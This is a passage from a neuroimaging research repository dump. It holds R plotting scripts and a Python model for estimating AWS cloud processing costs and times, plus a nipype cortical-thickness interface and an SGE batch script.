ggplot(mean_total_cost_df, aes(x=Bid.ratio, y=mean_cost, colour=Av.zone)) + geom_line()\n p3 <- ggplot(mean_total_time_df, aes(x=Bid.ratio, y=mean_time, colour=Av.zone)) + geom_line()\n \n p_list <- list(p0, p1, p2, p3)\n \n # Return list of plots\n return(p_list)\n}\n\n# p_list <- sim_plots(cpac_csv, bid_ratio, num_datasets)\n# \n# print(p_list[1])\n# print(p_list[2])\n# print(p_list[3])\n# print(p_list[4])\n\n# Save pdfs\n# pdf(file = \"~/Documents/projects/Clark2015_AWS/poster/mean-costs_1000ds-cpac.pdf\", width=5, height = 5)\n# print(p_list[3])\n# dev.off()\n# pdf(file = \"~/Documents/projects/Clark2015_AWS/poster/mean-times_1000ds-cpac.pdf\", width=5, height = 5)\n# print(p_list[4])\n# dev.off()\n\n\n# Calculate captial costs\ncalc_costs_cap <- function(num_datasets, jobs_per, num_mins){\n\n # Init variables\n workstation <- 8642\n salary <- .05 * 50000 * 1.25\n power_supply_kw <- .9*1100/1000\n power_kw <- .1055\n\n # Compute hours from minutes\n num_hours = num_mins/60.0\n\n # Calculate the number of hours\n num_iters <- ceiling(num_datasets / jobs_per)\n num_hours <- ceiling(num_hours * num_iters)\n total_cost = workstation + salary + num_hours * power_supply_kw * power_kw\n\n # Return total cost\n return(total_cost)\n}\n\n\n# Calculate capital time\ncalc_time_cap <- function(num_datasets, jobs_per, num_mins){\n\n # Comput hours from minutes\n num_hours <- num_mins/60.0\n\n # Calculate the number of hours\n num_iters <- max(ceiling(num_datasets/jobs_per), 1)\n num_hours <- ceiling(num_hours * num_iters)\n\n # Return total time\n return(num_hours)\n}\n\n\n# Costs dataframe and plots\ncosts_df_plots <- function(df, max_num, costs_compare){\n\n # Reshape data\n costs_df <- melt(df, id=c('X', 'Download.time', 'Upload.time', 'Wait.time',\n 'Run.time', 'Total.cost', 'Total.time', 'Sim.index',\n 'Av.zone', 'Bid.ratio', 'Bid.price', 'Num.datasets',\n 'Start.time', 'Interrupts', 'First.Iter.Time'))\n\n # Get the levels for variable in required order\n costs_df$variable <- factor(costs_df$variable, levels=c('Instance.cost', 'Storage.cost', 'Tranfer.cost'))\n costs_df <- arrange(costs_df, Num.datasets, variable)\n\n # Calculate the percentages\n costs_df <- ddply(costs_df, .(Num.datasets), transform, percent=value/sum(value)*100)\n\n # Format the labels and calculate their positions\n costs_df <- ddply(costs_df, .(Num.datasets), transform, pos=(cumsum(value) - 0.5*value))\n costs_df$label <- paste0(sprintf(\"%.0f\", costs_df$percent), \"%\")\n\n # Get all data under maxnum datasets\n costs_maxnum <- subset(costs_df, Num.datasets <= max_num)\n cap_costs_maxnum <- subset(costs_compare, num_datasets <= max_num)\n\n # Initial plot\n p0 <- ggplot() +\n geom_bar(data=costs_maxnum,\n aes(x=factor(Num.datasets), y=value, fill=variable),\n stat='identity', width=1)\n # Format plot\n p0_format <- p0 +\n xlab(\"Number of Datasets\")+\n ylab(\"Cost ($)\")+\n guides(col = guide_legend(ncol = 3, byrow=FALSE)) +\n scale_fill_discrete(labels=c('Instance Cost ', 'Storage Cost ', 'Transfer Cost ')) +\n scale_x_discrete(breaks=c(100, 2000, seq(0, max_num, 5000))) +\n theme_bw()+\n theme(axis.title.x = element_text(size=12,colour=\"black\", vjust=-.8),\n axis.title.y = element_text(size=12,colour=\"black\"),\n axis.text.x = element_text(size=8,colour=\"black\", angle=35),\n axis.text.y = element_text(size=8,colour=\"black\"),\n legend.position=\"bottom\",\n legend.title=element_blank(),\n legend.key=element_blank(),\n legend.key.size=unit(1, \"mm\"),\n legend.margin=unit(1,\"cm\"),\n legend.key.height=unit(3,\"mm\"),\n legend.key.width=unit(3,\"mm\"),\n panel.margin=unit(20,\"mm\"),\n legend.text = element_text(size=10))\n\n # Add percentages (optional)\n # p0_perc <- p0_format + geom_text(data=subset(costs_maxnum, Num.datasets >= 7000),\n # aes(x=factor(Num.datasets), y=pos, label=label), size=2)\n\n # Add other line over the top (this isnt working, verrry hard to figure out)\n p0_withline <- p0_format + geom_line(data=costs_compare, aes(x=as.numeric(factor(num_datasets)), y=cap_costs))\n\n # Return plots\n return(p0_withline)\n}\n\n\n# Times dataframe and plots\ntimes_df_plots <- function(df, max_num, times_compare){\n\n # Add total_time difference to df\n df$znodl_diff <- df$Total.time - df$Total.time.nodl\n\n # Reshape data\n times_df <- melt(df, id=c('X', 'Tranfer.cost', 'Storage.cost', 'Instance.cost', 'Wait.time',\n 'Total.cost', 'Total.time', 'Download.time', 'Upload.time', 'Run.time', 'Sim.index',\n 'Av.zone', 'Bid.ratio', 'Bid.price', 'Num.datasets',\n 'Start.time', 'Interrupts', 'First.Iter.Time'))\n\n # Get the levels for variable in required order\n times_df$variable <- factor(times_df$variable, levels=c('Total.time.nodl', 'znodl_diff'))\n times_df <- arrange(times_df, Num.datasets, variable)\n\n # Calculate the percentages\n #times_df <- ddply(times_df, .(Num.datasets), transform, percent=value/Total.time*100)\n\n # Format the labels and calculate their positions\n #times_df <- ddply(times_df, .(Num.datasets), transform, pos=(value - 0.5*value))\n times_df$label <- paste0(sprintf(\"%.0f\", times_df$percent), \"%\")\n\n # Get all data under maxnum datasets\n times_maxnum <- subset(times_df, Num.datasets <= max_num)\n\n # Initial plot\n p0 <- ggplot() + geom_bar(data=times_maxnum,\n aes(x=factor(Num.datasets), y=value/60.0, fill=variable), stat='identity')\n\n # Format plot\n p0_format <- p0 +\n xlab(\"Number of Datasets\")+\n ylab(\"Time (hours)\")+\n guides(col = guide_legend(ncol = 3, byrow = FALSE))+\n scale_fill_discrete(labels=c('No Download ', 'Total Processing Time ')) +\n scale_x_discrete(breaks=c(100, 2000, seq(0, max_num, 5000))) +\n theme_bw()+\n theme(axis.title.x = element_text(size=12,colour=\"black\", vjust=-.8),\n axis.title.y = element_text(size=12,colour=\"black\"),\n axis.text.x = element_text(size=8,colour=\"black\", angle=35),\n axis.text.y = element_text(size=8,colour=\"black\"),\n legend.position=\"bottom\",\n legend.title=element_blank(),\n legend.key=element_blank(),\n legend.key.size=unit(1, \"mm\"),\n legend.margin=unit(1,\"cm\"),\n legend.key.height=unit(3,\"mm\"),\n legend.key.width=unit(3,\"mm\"),\n panel.margin=unit(20,\"mm\"),\n legend.text = element_text(size=10))\n\n # Add percentages (optional)\n # p0_perc <- p0_format +\n # geom_text(data=subset(times_maxnum, Num.datasets >=2000),\n # aes(x=factor(Num.datasets), label=label, y=pos/60), position=position_dodge(width=1),\n # size=3)\n\n # Add trendline\n p0_withline <- p0_format + geom_line(data=times_compare, aes(x=as.numeric(factor(num_datasets)), y=cap_time))\n\n # Return plots\n return(p0_withline)\n}\n\n# Fixed plots\ncpac_csv <- '~/Documents/projects/Clark2015_AWS/spot-model/fixed-outs/cpac_with_dl.csv'\ncpac_csv_nodl <- '~/Documents/projects/Clark2015_AWS/spot-model/fixed-outs/cpac_without_dl.csv'\nfs_csv <- '~/Documents/projects/Clark2015_AWS/spot-model/fixed-outs/fs_with_dl.csv'\nfs_csv_nodl <- '~/Documents/projects/Clark2015_AWS/spot-model/fixed-outs/fs_without_dl.csv'\n\n# Init variables\njobs_per = 3\nnum_mins = 45\n# Number of datasets\nmax_num = 50000\n\n# Read in dataframe\ndf <- read.csv(fs_csv)\ndf_ndl <- read.csv(fs_csv_nodl)\n\n# Create capital costs dataframe\ncosts_compare <- data.frame(num_datasets=df$Num.datasets[df$Num.datasets <= max_num])\ntimes_compare <- data.frame(num_datasets=df$Num.datasets[df$Num.datasets <= max_num])\n\n# Populate dateframe with capital costs\ncosts_compare$cap_costs <- apply(costs_compare[1], 1, jobs_per=jobs_per, num_mins=num_mins, calc_costs_cap)\ntimes_compare$cap_time <- apply(times_compare[1], 1, jobs_per=jobs_per, num_mins=num_mins, calc_time_cap)\n\n# Get plots\ncosts_plot <- costs_df_plots(df, max_num, costs_compare)\n# Without percentages\nprint(costs_plot)\n\n# Time no dl\ndf$Total.time.nodl <- df_ndl$Total.time\n# Get plots\ntimes_plot <- times_df_plots(df, max_num, times_compare)\n# Without percentages\nprint(times_plot)\n\n# Save pdfs\npdf(file = \"~/Documents/projects/Clark2015_AWS/poster/fs-costs.pdf\", width=5, height = 5)\nprint(costs_plot)\ndev.off()\n\npdf(file = \"~/Documents/projects/Clark2015_AWS/poster/fs-times.pdf\", width=5, height = 5)\nprint(times_plot)\ndev.off()\n" }, { "alpha_fraction": 0.5506617426872253, "alphanum_fraction": 0.5604252815246582, "avg_line_length": 33.654136657714844, "blob_id": "faf53453eb50aeab0787de9443a31a3299fd953c", "content_id": "6a5ce008552c8da843e1c5e8072ea03b9a3785bd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4609, "license_type": "permissive", "max_line_length": 124, "num_lines": 133, "path": "/spot-model/run_static_model.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# run_static_model.py\n#\n# Author: Daniel Clark, 2015\n\n'''\n'''\n\n# Load config file and run static model\ndef load_and_run(config, av_zone, price_hr):\n '''\n '''\n\n # Import packages\n import os\n import numpy as np\n import pandas as pd\n import yaml\n\n # Relative imports\n from spot_price_model import calc_s3_model_costs\n import utils\n\n # Init variables\n df_rows = []\n cfg_dict = yaml.load(open(config, 'r'))\n\n # Model parameters\n down_rate = cfg_dict['down_rate']\n in_gb = cfg_dict['in_gb']\n instance_type = cfg_dict['instance_type']\n jobs_per = cfg_dict['jobs_per']\n num_jobs_arr = cfg_dict['num_jobs']\n out_gb = cfg_dict['out_gb']\n out_gb_dl = cfg_dict['out_gb_dl']\n proc_time = cfg_dict['proc_time']\n proc_time *= 60.0 # convert to seconds\n product = cfg_dict['product']\n up_rate = cfg_dict['up_rate']\n\n # Evaluate for each dataset size (number of jobs)\n for num_jobs in num_jobs_arr:\n print '%d datasets...' % num_jobs\n\n # Tune parameters for cost model\n num_nodes = min(np.ceil(float(num_jobs)/jobs_per), 20)\n num_iter = np.ceil(num_jobs/float((jobs_per*num_nodes)))\n\n # Runtime parameters\n run_time = num_iter*proc_time\n wait_time = 0\n pernode_cost = np.ceil(run_time/3600.0)*price_hr\n num_interruipts = 0\n first_iter_time = proc_time\n\n # Grab costs from s3 model\n print av_zone\n total_cost, instance_cost, ebs_storage_cost, s3_cost, \\\n s3_storage_cost, s3_req_cost, s3_xfer_cost, \\\n total_time, run_time, wait_time, \\\n xfer_up_time, s3_upl_time, s3_download_time = \\\n calc_s3_model_costs(run_time, wait_time, pernode_cost,\n first_iter_time, num_jobs, num_nodes, jobs_per,\n av_zone, in_gb, out_gb, up_rate, down_rate)\n\n # Populate dictionary\n row_dict = {'av_zone' : av_zone, 'down_rate' : down_rate,\n 'in_gb' : in_gb, 'instance_type' : instance_type,\n 'jobs_per' : jobs_per, 'num_datasets' : num_jobs,\n 'out_gb' : out_gb, 'out_gb_dl' : out_gb_dl,\n 'proc_time' : proc_time, 'product' : product,\n 'up_rate' : up_rate, 'price_hr' : price_hr,\n 'static_total_cost' : total_cost,\n 'static_instance_cost' : instance_cost,\n 'static_ebs_storage_cost' : ebs_storage_cost,\n 's3_total_cost' : s3_cost,\n 's3_storage_cost' : s3_storage_cost,\n 's3_req_cost' : s3_req_cost,\n 's3_xfer_cost' : s3_xfer_cost,\n 'static_total_time' : total_time,\n 'static_run_time' : run_time,\n 'static_wait_time' : wait_time,\n 'xfer_up_time' : xfer_up_time,\n 's3_upl_time' : s3_upl_time,\n 's3_dl_time' : s3_download_time}\n\n # Convert to pandas series and add to list\n row_series = pd.Series(row_dict)\n df_rows.append(row_series)\n\n # Create static model dataframe\n static_df = pd.DataFrame.from_records(df_rows)\n\n out_df_path = os.path.join(os.getcwd(), os.path.basename(config).split('.')[0], str(price_hr), av_zone, 'on_demand.csv')\n if not os.path.exists(os.path.dirname(out_df_path)):\n os.makedirs(os.path.dirname(out_df_path))\n static_df.to_csv(out_df_path)\n\n # Return dataframe\n return static_df\n\n\n# Make executable\nif __name__ == '__main__':\n\n # Import packages\n import argparse\n import os\n\n # Init argparser\n parser = argparse.ArgumentParser(description=__doc__)\n\n # Required arguments\n parser.add_argument('-c', '--config', nargs=1, required=True,\n type=str, help='Filepath to the sim config file')\n parser.add_argument('-p', '--price_hr', nargs=1, required=True,\n type=float, help='Price per compute hour to assume')\n parser.add_argument('-z', '--av_zone', nargs=1, required=False, type=str,\n help='Specify availability zone of interest')\n\n # Parse arguments\n args = parser.parse_args()\n\n # Init variables\n config = args.config[0]\n price_hr = args.price_hr[0]\n av_zone = args.av_zone[0]\n\n # Call static model function\n static_df = load_and_run(config, av_zone, price_hr)\n\n # Write to disk\n out_df_path = os.path.join(os.getcwd(), os.path.basename(config).split('.')[0], str(price_hr), av_zone, 'on_demand.csv')\n static_df.to_csv(out_df_path)\n" }, { "alpha_fraction": 0.6390444040298462, "alphanum_fraction": 0.6463232636451721, "avg_line_length": 52.029701232910156, "blob_id": "c52de9831442a1f767132421426d01c0a71debf2", "content_id": "8db6bbebddb4500eaea06411422ca5116d93e375", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5358, "license_type": "permissive", "max_line_length": 121, "num_lines": 101, "path": "/data-preproc/scripts/act_interface.py", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# Import packages\nimport os\nimport os.path as op\nimport warnings\nimport numpy as np\nfrom nipype.interfaces.base import (TraitedSpec, File, InputMultiPath,\n OutputMultiPath, Undefined, traits,\n isdefined, OutputMultiPath,\n CommandLine, CommandLineInputSpec)\nfrom nipype.utils.filemanip import split_filename\nfrom nibabel import load\n\nwarn = warnings.warn\nwarnings.filterwarnings('always', category=UserWarning)\n\n\n# Input spec class\nclass antsCorticalThicknessInputSpec(CommandLineInputSpec):\n dimension = traits.Int(argstr='-d %s', mandatory=True,\n position=0, desc='image dimension')\n segmentation_iterations = traits.Int(argstr='-n %s',\n postion=1, desc='N4 iterations during segmentation')\n segmentation_weight = traits.Float(argstr='-w %s',\n position=2, desc='Atropos spatial prior probability' \\\n 'weight for the segmentation')\n input_skull = File(exists=True, argstr='-a %s', mandatory=True,\n position=3, desc='input file')\n template = File(exists=True, argstr='-e %s', mandatory=True,\n position=4, desc='reference file')\n brain_prob_mask = File(exists=True, argstr='-m %s', mandatory=True,\n position=5, desc='brain probability mask')\n brain_seg_priors = traits.Str(exists=True, argstr='-p %s', mandatory=True,\n position=6, desc='brain segmentation priors')\n intensity_template = File(exists=True, argstr='-t %s', position=7,\n desc='intensity template')\n extraction_registration_mask = File(exists=True, argstr='-f %s',\n position=8, desc='extraction registration mask')\n out_prefix = traits.Str(exists=True, argstr='-o %s', mandatory=True,\n position=9, desc='output prefix')\n keep_intermediate_files = traits.Int(True, argstr='-k %s', position=10,\n desc='choose to delete intermediary files')\n\n\n# Output spec class\nclass antsCorticalThicknessOutputSpec(TraitedSpec):\n brain_extraction_mask = File(exists=True,\n desc='')\n brain_segmentation = File(exists=True,\n desc='')\n brain_segmentation_N4 = File(exists=True,\n desc='one for each anatomical input')\n brain_segmentation_posteriors_1 = File(exists=True,\n desc='csf')\n brain_segmentation_posteriors_2 = File(exists=True,\n desc='gm')\n brain_segmentation_posteriors_3 = File(exists=True,\n desc='wm')\n brain_segmentation_posteriors_4 = File(exists=True,\n desc='deep gm')\n brain_segmentation_posteriors_5 = File(exists=True,\n desc='wm')\n brain_segmentation_posteriors_6 = File(exists=True,\n desc='deep gm')\n brain_segmentation_posteriors_N = File(exists=True,\n desc='one for each prior')\n# extracted_anatomical_brain = File(exists=True,\n# desc='skull-stripped anatomical brain')\n ants_registration_affine = File(exists=True,\n desc='one of the antsRegistration warps')\n ants_registration_warp = File(exists=True,\n desc='one of the antsRegistration warps (non-linear)')\n cortical_thickness = File(exists=True,\n desc='')\n cortical_thickness_normalized = File(exists=True,\n desc='')\n\n\n# Cortical thickness node\nclass antsCorticalThickness(CommandLine):\n\n _cmd = 'antsCorticalThickness.sh'\n input_spec = antsCorticalThicknessInputSpec\n output_spec = antsCorticalThicknessOutputSpec\n\n def _list_outputs(self):\n outputs = self.output_spec().get()\n outputs['brain_extraction_mask'] = os.path.abspath('OUTPUT_BrainExtractionMask.nii.gz')\n outputs['brain_segmentation'] = os.path.abspath('OUTPUT_BrainSegmentation.nii.gz')\n outputs['brain_segmentation_N4'] = os.path.abspath('OUTPUT_BrainSegmentation0N4.nii.gz')\n outputs['brain_segmentation_posteriors_1'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors1.nii.gz')\n outputs['brain_segmentation_posteriors_2'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors2.nii.gz')\n outputs['brain_segmentation_posteriors_3'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors3.nii.gz')\n outputs['brain_segmentation_posteriors_4'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors4.nii.gz')\n outputs['brain_segmentation_posteriors_5'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors5.nii.gz')\n outputs['brain_segmentation_posteriors_6'] = os.path.abspath('OUTPUT_BrainSegmentationPosteriors6.nii.gz')\n# outputs['extracted_anatomical_brain'] = os.path.abspath('OUTPUT_ExtractedBrain0N4.nii.gz')\n outputs['ants_registration_affine'] = os.path.abspath('OUTPUT_SubjectToTemplate0GenericAffine.mat')\n outputs['ants_registration_warp'] = os.path.abspath('OUTPUT_SubjectToTemplate1Warp.nii.gz')\n outputs['cortical_thickness'] = os.path.abspath('OUTPUT_CorticalThickness.nii.gz')\n outputs['cortical_thickness_normalized'] = os.path.abspath('OUTPUT_CorticalThicknessNormalizedToTemplate.nii.gz')\n return outputs\n\n\n" }, { "alpha_fraction": 0.6075268983840942, "alphanum_fraction": 0.6209677457809448, "avg_line_length": 25.571428298950195, "blob_id": "5517fe9e4260af92cf111ea6615a9cff49a9fdc4", "content_id": "43f84bd66d217a26949aac995047311512e90d56", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 372, "license_type": "permissive", "max_line_length": 49, "num_lines": 14, "path": "/data-preproc/scripts/act_run.sge", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "#! /bin/bash\n#$ -cwd\n#$ -S /bin/bash\n#$ -V\n#$ -t 1-50\n#$ -q all.q\n#$ -pe mpi_smp 8\n#$ -e /home/ubuntu/act_run.err\n#$ -o /home/ubuntu/act_run.out\nsource /etc/profile.d/cpac_env.sh\necho \"Start - TASKID \" $SGE_TASK_ID \" : \" $(date)\nexport ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS=8\npython /home/ubuntu/act_run.py $SGE_TASK_ID /mnt\necho \"End - TASKID \" $SGE_TASK_ID \" : \" $(date)\n" }, { "alpha_fraction": 0.5679012537002563, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 19.25, "blob_id": "4efc3095d2244d3635fecf82da5ddb99493547bb", "content_id": "0911a5ded293d2de0fae407e1f9be7a8444d53ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 81, "license_type": "permissive", "max_line_length": 44, "num_lines": 4, "path": "/poster/README.md", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "AWS_OHBM2015_poster\n==============\n\nNDAR/AWS poster for the 2015 OHBM conference\n" }, { "alpha_fraction": 0.6309472918510437, "alphanum_fraction": 0.6545220613479614, "avg_line_length": 36.15286636352539, "blob_id": "0a2498c000ceb9f87e271e0d6551bd9c31d4b9e6", "content_id": "a99623aa973a5d502c61439e9b532b33a6561de6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 11665, "license_type": "permissive", "max_line_length": 146, "num_lines": 314, "path": "/spot-model/plot_static_times_costs.R", "repo_name": "computational-neuroimaging-lab/Clark2015_AWS", "src_encoding": "UTF-8", "text": "# spot-model/plot_static_times_costs.R\n#\n# Author: Cameron Craddock, Daniel Clark (2015)\n\n# Import packages\nlibrary(ggplot2)\nlibrary(gridExtra)\nlibrary(plyr)\nlibrary(reshape2)\nlibrary(scales)\n\n\n# Populate regions with name formatted\nformat_region <- function(data_frame) {\n data_frame$region[grep('us-west-1',data_frame$av_zone)]='N. California'\n data_frame$region[grep('us-west-2',data_frame$av_zone)]='Oregon'\n data_frame$region[grep('us-east-1',data_frame$av_zone)]='N. Virginia'\n data_frame$region[grep('eu-west-1',data_frame$av_zone)]='Ireland'\n data_frame$region[grep('eu-central-1',data_frame$av_zone)]='Frankfurt'\n data_frame$region[grep('ap-southeast-1',data_frame$av_zone)]='Singapore'\n data_frame$region[grep('ap-southeast-2',data_frame$av_zone)]='Sydney'\n data_frame$region[grep('ap-northeast-1',data_frame$av_zone)]='Tokyo'\n data_frame$region[grep('sa-east-1',data_frame$av_zone)]='Sao Paulo'\n #data_frame$region=factor(data_frame$region)\n \n # Return the data frame with region header\n return(data_frame)\n}\n\n\n# Format cost/time vs num_ds/bid_ratio plots\nfactorize_region <- function(plot_obj) {\n \n # Add ggplot2 formatting to plot object\n frmt_plot <- plot_obj +\n geom_line() +\n facet_grid(region~., scales='free_y') +\n theme_bw() +\n theme(legend.position='None',\n axis.title.x=element_text(size=10, colour='black', vjust=-.8),\n axis.title.y=element_text(size=10, colour='black'),\n axis.text.x=element_text(size=8, colour='black', angle=0),\n axis.text.y=element_text(size=8, colour='black'),\n strip.text.y=element_text(size=8, colour='black'))\n \n # Return formatted plot\n return(frmt_plot)\n}\n\n\n# Format cost/time vs num_ds/bid_ratio plots\nbreakout_bid_ratios <- function(plot_obj) {\n \n # Add ggplot2 formatting to plot object\n frmt_plot <- plot_obj +\n facet_grid(bid_ratio~., scales='free_y') +\n theme_bw() +\n theme(legend.position='None',\n axis.title.x=element_text(size=10, colour='black', vjust=-.8),\n axis.title.y=element_text(size=10, colour='black'),\n axis.text.x=element_text(size=8, colour='black', angle=35),\n axis.text.y=element_text(size=8, colour='black'),\n strip.text.y=element_text(size=8, colour='black'))\n \n # Return formatted plot\n return(frmt_plot)\n}\n\n\n# Plot and print simulation results to pdf\nplot_ondemand <- function(df, out_file) {\n\n # Get on demand costs plot\n ondemand_cost <- ggplot(df, aes(x=num_datasets, y=on_demand_total_cost, col=region)) +\n labs(x='Number of datasets', y='Total cost ($)',\n title='On-demand costs') + geom_line()\n #ondemand_cost <- factorize_region(ondemand_cost)\n \n # Get on demand costs plot\n ondemand_time <- ggplot(df, aes(x=num_datasets, y=static_total_time/3600.0, col='all regions')) +\n labs(x='Number of datasets', y='Total time (hrs)',\n title='On-demand times') + geom_line()\n #ondemand_time <- factorize_region(ondemand_time)\n \n # Open pdf file to save plots to\n pdf(file=out_file, title='ondemand', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n # Set up the 2x2 grid\n grid.newpage()\n layout=grid.layout(2,1)\n pushViewport(viewport(layout=layout))\n \n # Print to pdf\n print(ondemand_cost, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(ondemand_time, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n \n # Shutdown printout device\n dev.off()\n}\n\n\n# Plot the costs vs times\nplot_cost_vs_times <- function(df, out_file) {\n on_demand <- ggplot(df, aes(x=static_total_time/3600.0,\n y=on_demand_total_cost, col=region)) +\n labs(x='Total time (hrs)', y='Total cost ($)', title='On-demand cost vs time') +\n geom_point(alpha=0.2)\n \n spot <- ggplot(df, aes(x=mean_total_time/3600.0, y=mean_total_cost, col=region)) +\n labs(x='Total time (hrs)', y='Total cost ($)', title='Mean spot cost vs time') +\n geom_point(alpha=0.2)\n \n pdf(file=out_file, title='time vs cost', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(2,1)\n pushViewport(viewport(layout=layout))\n \n print(on_demand, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(spot, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n \n dev.off()\n}\n\n\n# Plot spot history\nplot_history <- function(df, out_file) {\n df$Timestamp <- as.POSIXct(df$Timestamp)\n sh <- ggplot(df, aes(x=Timestamp, y=Spot.price, col=Availability.zone)) + geom_line() +\n scale_x_datetime(labels=date_format(format='%Y-%m')) + labs(x='Date', y='Spot price ($/hr)',\n title='Spot market history across regions')\n \n pdf(file=out_file, title='br', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(1,1)\n pushViewport(viewport(layout=layout))\n sh <- factorize_region(sh)\n print(sh, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n \n dev.off()\n}\n\n\n# \nplot_cost_vs_times_br <- function(df, out_file) {\n spot <- ggplot(df, aes(x=mean_total_time/3600.0, y=mean_total_cost, col=region)) +\n labs(x='Total time (hrs)', y='Total cost ($)', title='Mean spot cost vs time') +\n geom_point(alpha=0.2)\n \n pdf(file=out_file, title='time vs cost br', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n spot <- breakout_bid_ratios(spot)\n# grid.newpage()\n# layout=grid.layout(1,1)\n# pushViewport(viewport(layout=layout))\n \n print(spot)#, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n dev.off()\n}\n\n\ndata_summary <- function (x)\n{\n q=median_hilow(x, conf.int=.5)\n print(q)\n return(q)\n}\n\nplot_br_violin <- function(df, out_file) {\n br_time <- ggplot(df, aes(x=factor(bid_ratio), y=total_time/3600.0, col=bid_ratio)) +\n labs(x='Bid ratio', y='Total time (hrs)', title='A') +\n geom_violin(outlier.size=0,width=0.5,fill=\"white\") + stat_summary(aes(colour=bid_ratio), fun.data=data_summary, size=.5, geom=\"pointrange\")\n #+scale_y_continuous(limits=quantile(df$total_time/3600.0, c(0.1, 0.9)))\n br_cost <- ggplot(df, aes(x=factor(bid_ratio), y=total_cost, col=bid_ratio)) +\n labs(x='Bid ratio', y='Total cost ($)', title='B') +\n geom_boxplot(outlier.shape=NA) +\n #geom_violin(outlier.size=0,width=0.5,fill=\"white\") + stat_summary(aes(colour=bid_ratio), fun.data=data_summary, size=.5, geom=\"pointrange\") +\n scale_y_continuous(limits=quantile(df$total_cost, c(0.1, 0.9)))\n \n pdf(file=out_file, title='br', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(2,1)\n pushViewport(viewport(layout=layout))\n \n print(br_time, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(br_cost, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n \n dev.off()\n}\n\n\nplot_av_violin <- function(df, out_file) {\n\n av_time <- ggplot(df, aes(x=factor(av_zone), y=total_time/3600.0, col=region)) +\n labs(x='Avail. zone', y='Total time (hrs)', title='C') +\n #geom_boxplot() +\n geom_violin(outlier.size=0,width=0.5,fill=\"white\") + stat_summary(aes(colour=region), fun.data=data_summary, size=.5, geom=\"pointrange\") +\n theme(axis.text.x=element_blank()) #+ scale_y_continuous(limits=quantile(df$total_time/3600.0, c(0.1, 0.87)))\n av_cost <- ggplot(df, aes(x=factor(av_zone), y=total_cost, col=region)) +\n labs(x='Avail. zone', y='Total cost ($)', title='D') +\n geom_boxplot(outlier.shape=NA) +\n #geom_violin(outlier.size=0,width=0.5,fill=\"white\") + stat_summary(aes(colour=region), fun.data=data_summary, size=.5, geom=\"pointrange\") +\n theme(axis.text.x=element_blank()) + scale_y_continuous(limits=quantile(df$total_cost, c(0.1, 0.9)))\n pdf(file=out_file, title='av', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(2,1)\n pushViewport(viewport(layout=layout))\n\n print(av_time, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(av_cost, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n #print(legend, vp=viewport(layout.pos.row=1:2, layout.pos.col=2))\n \n dev.off()\n}\n\n\nplot_mean_vars_hist <- function(df, out_file) {\n \n mean_hist_time <- ggplot(df, aes(x=history_mean, y=mean_total_time/3600.0, col=region)) +\n labs(x='Mean history price ($)', y='Mean run time (hrs)', title='A') +\n geom_point(alpha=0.2) + theme(legend.position='none')\n mean_hist_cost <- ggplot(df, aes(x=history_mean, y=mean_total_cost, col=region)) +\n labs(x='Mean history price ($)', y='Mean total cost ($)', title='B') +\n geom_point(alpha=0.2)+ theme(legend.position='none')\n var_hist_time <- ggplot(df, aes(x=history_var, y=mean_total_time/3600.0, col=region)) +\n labs(x='Price history variance ($)', y='Mean run time (hrs)', title='C') +\n geom_point(alpha=0.2) + theme(legend.position='none')\n var_hist_cost <- ggplot(df, aes(x=history_var, y=mean_total_cost, col=region)) +\n labs(x='Price history variance ($)', y='Mean total cost ($)', title='D') +\n geom_point(alpha=0.2)+ theme(legend.position='none')\n \n pdf(file=out_file, title='av', width=8, height=180/25.4,\n family='ArialMT', paper='special')\n \n grid.newpage()\n layout=grid.layout(2,2)\n pushViewport(viewport(layout=layout))\n \n print(mean_hist_time, vp=viewport(layout.pos.row=1, layout.pos.col=1))\n print(mean_hist_cost, vp=viewport(layout.pos.row=1, layout.pos.col=2))\n print(var_hist_time, vp=viewport(layout.pos.row=2, layout.pos.col=1))\n print(var_hist_cost, vp=viewport(layout.pos.row=2, layout.pos.col=2))\n \n dev.off()\n}\n\n\nplot_mean_vars_hist <- function(df, out_file) {\n \n mean_hist_time <- ggplot(df, aes(x=history_mean, y=mean_total_time/3600.0, col=region)) +\n labs(x='Mean history price ($)', y='Mean run time (hrs)', title='A') +\n geom_point(alpha=0.2) + theme(legend.position='none')\n mean_hist_cost <- ggplot(df, aes(x=history_mean, y=mean_total_cost, col=region)) +\n labs(x='Mean history price ($)', y='Mean total cost ($)', title='B') +\n 